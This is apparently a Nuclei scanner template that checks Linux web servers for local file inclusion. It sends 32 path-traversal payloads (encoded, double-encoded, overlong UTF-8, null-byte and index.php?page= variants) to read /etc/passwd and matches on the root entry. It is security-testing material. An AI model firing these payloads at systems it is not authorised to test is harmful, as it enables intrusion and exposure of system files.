id: generic-linux-lfi

info:
  name: Generic Linux - Local File Inclusion
  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
  severity: high
  description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 32
  tags: linux,lfi,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/etc/passwd"
        - "/..%5cetc/passwd"
        - "/..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5cetc/passwd"
        - "/static/..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/./../../../../../../../../../../etc/passwd"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
        - "/..///////..////..//////etc/passwd"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
        - "/index.php?page=etc/passwd"
        - "/index.php?page=etc/passwd%00"
        - "/index.php?page=../../etc/passwd"
        - "/index.php?page=....//....//etc/passwd"
        - "/../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4a0a0047304502210085a70499a0dfb0d98747765ae63251135079d8afd69becb11fa060e31e1362cd02207febb6e2d3177b3898fca7e9e06831d0098d0e7fd8cdc3e2e939a399801b710c:922c64590222798bb761d5b6d8e72950